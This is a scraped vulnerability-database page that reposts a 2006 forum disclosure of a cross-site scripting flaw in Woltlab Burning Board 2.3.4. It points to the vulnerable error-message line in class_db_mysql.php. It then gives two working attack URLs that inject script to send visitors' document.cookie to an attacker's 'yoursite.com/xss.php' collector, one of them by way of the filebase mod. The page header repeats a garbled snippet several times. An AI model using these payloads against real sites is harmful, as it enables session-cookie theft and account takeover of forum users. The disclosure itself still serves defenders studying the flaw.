Script: ".getenv("REQUEST_URI")."n
"; hmm what can we do with that?if there is an sql db error you may do /wbb/xx.php?<scri...">Xss in Wbb 2.3.4 - vulnerability database | Vulners.comScript: ".getenv("REQUEST_URI")."n
"; hmm what can we do with that?if there is an sql db error you may do /wbb/xx.php?<scri...">Script: ".getenv("REQUEST_URI")."n
"; hmm what can we do with that?if there is an sql db error you may do /wbb/xx.php?<scri...">Script: ".getenv("REQUEST_URI")."n
"; hmm what can we do with that?if there is an sql db error you may do /wbb/xx.php?<scri...">
Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11859
HistoryMar 19, 2006 - 12:00 a.m.

Xss in Wbb 2.3.4

2006-03-1900:00:00
vulners.com
7

hi again friends
i discovered a xss in wbb again ;)
in
wbb/acp/lib/class_db_mysql.php

in the 123.line

$errormsg .= "<b>Script:</b> ".getenv("REQUEST_URI")."\n<br>";

hmm what can we do with that?
if there is an sql db error you may do

/wbb/xx.php?<script>location.href='http://yoursite.com/xss.php?cook=&#39;+escape&#40;document.cookie&#41;&lt;/script&gt;

or you may use filebase mod for make an sql error

like that

http://www.wbbsite.com/filebase_redirect.php?fid=&#39;&lt;script&gt;location.href=&#39;http://yoursite.com/xss.php?cook=&#39;+escape&#40;document.cookie&#41;&lt;/script&gt;

WwW.SpyMasterSnake.org
Tontonq ;)